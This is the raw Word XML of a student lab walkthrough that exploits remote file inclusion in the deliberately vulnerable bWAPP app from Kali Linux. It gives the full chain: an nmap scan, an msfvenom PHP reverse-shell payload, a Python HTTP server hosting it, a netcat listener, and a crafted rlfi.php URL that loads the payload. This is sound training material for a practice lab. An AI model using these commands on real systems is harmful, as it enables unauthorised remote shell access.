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40" w:rsidRPr="00593BA5" w:rsidRDefault="00593BA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00593BA5">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA5" w:rsidRPr="00ED0BA9" w:rsidRDefault="00593BA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED0BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED0BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED0BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>beebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED0BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ka</w:t>
      </w:r>
      <w:r w:rsidR="00506759">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">li </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00506759">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00506759">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> make sure both machines </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED0BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are  connected</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED0BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with same adapter (NAT)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA5" w:rsidRDefault="00593BA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00593BA5">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00593BA5">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA5" w:rsidRDefault="00593BA5">
      <w:pP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sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Open terminal and type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593BA5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map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00593BA5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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593BA5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n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00593BA5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92.168.31.130</w:t>
      </w:r>
      <w:r w:rsidRPr="00593BA5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/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00593BA5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24 </w:t>
      </w:r>
      <w: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for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w: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host discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA5" w:rsidRPr="00593BA5" w:rsidRDefault="00593BA5">
      <w:pP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3BA5">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="en-I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>
            <wp:extent cx="5664110" cy="3386666"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1" name="Picture 1" descr="C:\Users\Tush\Desktop\tush\screenshot\Screenshot_2025-03-16_09-34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sh\Desktop\tush\screenshot\Screenshot_2025-03-16_09-34-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216" cy="33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A5" w:rsidRPr="00593BA5" w:rsidRDefault="00593BA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00593BA5" w:rsidRDefault="00593BA5">
      <w:pP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-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w: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593BA5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92.168.31.132 this is my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593BA5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ebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00593BA5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593BA5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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00593BA5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593BA5" w:rsidRDefault="00593BA5">
      <w:pP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93BA5" w:rsidRDefault="00593BA5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BA5">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA5" w:rsidRDefault="00593BA5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n browser and search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ress </w:t>
      </w:r>
      <w:r w:rsidRPr="00593BA5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92.168.31.132 </w:t>
      </w:r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s enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA5" w:rsidRDefault="00593BA5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3BA5">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="5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4478655" cy="5012055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="C:\Users\Tush\Desktop\tush\screenshot\Screenshot_2025-03-16_09-36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sh\Desktop\tush\screenshot\Screenshot_2025-03-16_09-36-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A5" w:rsidRDefault="00593BA5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ick on- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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WAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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D0BA9" w:rsidRDefault="00ED0BA9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0BA9" w:rsidRDefault="00ED0BA9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0BA9" w:rsidRDefault="00ED0BA9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BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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4</w:t>
      </w:r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D0BA9" w:rsidRDefault="00ED0BA9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enter login id and password </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED0BA9" w:rsidRDefault="00ED0BA9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s enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED0BA9" w:rsidRDefault="00ED0BA9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BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="5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>
            <wp:extent cx="4673600" cy="6491110"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="3" name="Picture 3" descr="C:\Users\Tush\Desktop\tush\screenshot\Screenshot_2025-03-16_09-37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sh\Desktop\tush\screenshot\Screenshot_2025-03-16_09-37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154" cy="650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BA9" w:rsidRDefault="00ED0BA9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BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED0BA9" w:rsidRDefault="00ED0BA9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click on choose your bug </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED0BA9" w:rsidRDefault="00ED0BA9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proofErr w:type="gramStart"/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rch :-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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0BA9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mote &amp; Local file inclusion (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED0BA9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fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED0BA9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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED0BA9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fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED0BA9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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED0BA9" w:rsidRDefault="00ED0BA9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ess hack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED0BA9" w:rsidRDefault="00ED0BA9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BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="5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982970" cy="5219700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="C:\Users\Tush\Desktop\tush\screenshot\Screenshot_2025-03-16_09-37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sh\Desktop\tush\screenshot\Screenshot_2025-03-16_09-37-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438" cy="522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BA5" w:rsidRDefault="00593BA5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0BA9" w:rsidRDefault="00ED0BA9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BA9">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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open new terminal and type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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</w:t>
      </w:r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verse_php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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LHOST=192.168.31.130 </w:t>
      </w:r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LPORT=1234 -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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yshell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w: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A33311" w:rsidRDefault="00A33311" w:rsidP="00A33311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3311">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="5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857875" cy="3390740"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="5" name="Picture 5" descr="C:\Users\Tush\Desktop\tush\screenshot\Screenshot_2025-03-16_09-3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sh\Desktop\tush\screenshot\Screenshot_2025-03-16_09-39-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" t="41866"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5888956" cy="340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0BA9" w:rsidRDefault="00ED0BA9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33311" w:rsidRPr="00593BA5" w:rsidRDefault="00A33311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shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ated done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33311" w:rsidRPr="00A33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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verse</w:t>
      </w:r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_php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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→ This is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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tasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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HP </w:t>
      </w:r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verse shell payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00A33311">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33311" w:rsidRPr="00A33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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33311" w:rsidRPr="00A33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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* LHOST=192.168.31.130</w:t>
      </w:r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gramStart"/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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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ttacker's local </w:t>
      </w:r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P address where the shell connection will be received.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33311" w:rsidRPr="00A33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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33311" w:rsidRPr="00A33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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* LPORT=1234 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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ocal port on the attacker's machine where the shell connection will be established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33311" w:rsidRPr="00A33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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93BA5" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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* -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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yshell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w: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-</w:t>
      </w:r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aves the generated </w:t>
      </w:r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ayload as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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yshell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A33311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:rsidR="00A33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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33311" w:rsidRDefault="00A33311" w:rsidP="00A33311">
      <w:pP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A33311" w:rsidRPr="00FF201C" w:rsidRDefault="00A33311" w:rsidP="00A33311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201C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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7</w:t>
      </w:r>
      <w:r w:rsidR="00FF201C" w:rsidRPr="00FF201C"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F201C" w:rsidRDefault="00FF201C" w:rsidP="00A33311">
      <w:pP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>
        <w:rPr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ype :-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr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F201C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ython –m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF201C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ttp.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF201C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80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF201C" w:rsidRDefault="00FF201C" w:rsidP="00A33311">
      <w:pP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proofErr w:type="gramStart"/>
      <w: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xplaination</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w: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:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r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- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF201C" w:rsidRPr="00FF201C" w:rsidRDefault="00FF201C" w:rsidP="00FF201C">
      <w:pP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 -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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</w:t>
      </w:r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ion in Python's module mode (here, r</w:t>
      </w:r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ning the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ule).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A04EC" w:rsidRDefault="00FF201C" w:rsidP="00FF201C">
      <w:pP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spellStart"/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.serve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="gramStart"/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ython's built-in HTTP server module, which</w:t>
      </w:r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rts a temporary web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF201C" w:rsidRPr="00FF201C" w:rsidRDefault="00FF201C" w:rsidP="00FF201C">
      <w:pP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201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80 The port number on which the server will run (port 80 is the default for HTTP traffic).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF201C" w:rsidRPr="00FF201C" w:rsidRDefault="001A04EC" w:rsidP="00FF201C">
      <w:pP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04EC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="4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731473" cy="3649980"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="9" name="Picture 9" descr="C:\Users\Tush\Desktop\Screenshot_2025-03-16_12-43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sh\Desktop\Screenshot_2025-03-16_12-43-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02" cy="365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EC" w:rsidRDefault="001A04EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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201C" w:rsidRDefault="00FF201C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201C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF201C" w:rsidRDefault="00FF201C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ype :-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart"/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vlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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34 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF201C" w:rsidRDefault="00FF201C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ination</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:p>
    <w:p w:rsidR="00FF201C" w:rsidRPr="00FF201C" w:rsidRDefault="00FF201C" w:rsidP="00FF201C">
      <w:pP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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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tcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ol (used for establishing network connections</w:t>
      </w:r>
      <w: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FF201C" w:rsidRPr="00FF201C" w:rsidRDefault="00FF201C" w:rsidP="00FF201C">
      <w:pP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n Disables DNS resolution (uses onl</w:t>
      </w:r>
      <w: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IP addresses, not hostnames).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF201C" w:rsidRPr="00FF201C" w:rsidRDefault="00FF201C" w:rsidP="00FF201C">
      <w:pP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V Enables verbos</w:t>
      </w:r>
      <w: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mode (displays more details).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF201C" w:rsidRPr="00FF201C" w:rsidRDefault="00FF201C" w:rsidP="00FF201C">
      <w:pP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l</w:t>
      </w:r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ables listener mode </w:t>
      </w:r>
      <w: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ccepts incoming connections).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF201C" w:rsidRDefault="00FF201C" w:rsidP="00FF201C">
      <w:pP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F201C"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p 1234 Listens on port 1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF201C" w:rsidRDefault="001A04EC" w:rsidP="00FF201C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i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04EC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40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731510" cy="3424577"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="10" name="Picture 10" descr="C:\Users\Tush\Desktop\Screenshot_2025-03-16_12-4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ush\Desktop\Screenshot_2025-03-16_12-43-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1C" w:rsidRDefault="001A04EC" w:rsidP="00FF201C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04EC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:highlight w:val="yellow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9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A04EC" w:rsidRDefault="001A04EC" w:rsidP="00FF201C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000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ow go to the browser edit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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1A04EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A04EC"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2.168.31.132/bWAPP/rlfi.php?language=</w:t>
      </w:r>
      <w:r w:rsidRPr="001A04EC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000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http://192.168.31.130/myshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001A04EC">
        <w:rPr>
          <w:b/>
          <w:i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  <w:r w:rsidRPr="001A04EC"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p&amp;action=go</w:t>
      </w:r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1A04EC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000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s enter </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A04EC" w:rsidRDefault="001A04EC" w:rsidP="00FF201C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04EC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="5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999790" cy="5265420"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="C:\Users\Tush\Desktop\tush\screenshot\Screenshot_2025-03-16_09-4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ush\Desktop\tush\screenshot\Screenshot_2025-03-16_09-41-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705" cy="527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4EC" w:rsidRDefault="001A04EC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506759" w:rsidRPr="001A04EC" w:rsidRDefault="001A04EC" w:rsidP="00FF201C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="5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6759">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:highlight w:val="yellow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s you see the reverse shell has</w:t>
      </w:r>
      <w:r w:rsidR="00506759" w:rsidRPr="00506759">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:highlight w:val="yellow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en</w:t>
      </w:r>
      <w:r w:rsidRPr="00506759">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:highlight w:val="yellow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ne </w:t>
      </w:r>
      <w:r w:rsidR="00506759" w:rsidRPr="00506759">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:highlight w:val="yellow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is all about the RFI</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00506759" w:rsidRPr="00506759">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:highlight w:val="yellow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  <w:r w:rsidR="00506759" w:rsidRPr="00506759">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:highlight w:val="yellow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mote file inclusion</w:t>
      </w:r>
      <w:r w:rsidR="00506759">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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06759" w:rsidRDefault="001A04EC" w:rsidP="00FF201C">
      <w:pP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04EC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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>
            <wp:extent cx="5731510" cy="3424577"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="12" name="Picture 12" descr="C:\Users\Tush\Desktop\tush\screenshot\Screenshot_2025-03-16_09-4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sh\Desktop\tush\screenshot\Screenshot_2025-03-16_09-42-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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="5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06759" w:rsidRPr="00506759" w:rsidRDefault="00506759" w:rsidP="00506759">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00506759" w:rsidRDefault="00506759" w:rsidP="00506759">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A04EC" w:rsidRPr="00506759" w:rsidRDefault="00506759" w:rsidP="00506759">
      <w:pPr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THANKUU…….</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001A04EC" w:rsidRPr="005067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6F0" w:rsidRDefault="005126F0" w:rsidP="001A04EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005126F0" w:rsidRDefault="005126F0" w:rsidP="001A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6F0" w:rsidRDefault="005126F0" w:rsidP="001A04EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005126F0" w:rsidRDefault="005126F0" w:rsidP="001A0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13AD5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E72C2F24"/>
    <w:lvl w:ilvl="0" w:tplc="D3A613D2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4011C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BBEA8344"/>
    <w:lvl w:ilvl="0" w:tplc="D7D6E02C">
      <w:start w:val="8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E0"/>
    <w:rsid w:val="000B5052"/>
    <w:rsid w:val="001A04EC"/>
    <w:rsid w:val="00496CE0"/>
    <w:rsid w:val="00506759"/>
    <w:rsid w:val="005126F0"/>
    <w:rsid w:val="00593BA5"/>
    <w:rsid w:val="00941740"/>
    <w:rsid w:val="00A33311"/>
    <w:rsid w:val="00ED0BA9"/>
    <w:rsid w:val="00FF2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4B51"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CC8E1413-3D35-4C7E-9AB8-C2AFBE825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0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4EC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001A0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4C5F-5EF2-4F92-8309-65387818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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tush</cp:lastModifiedBy>
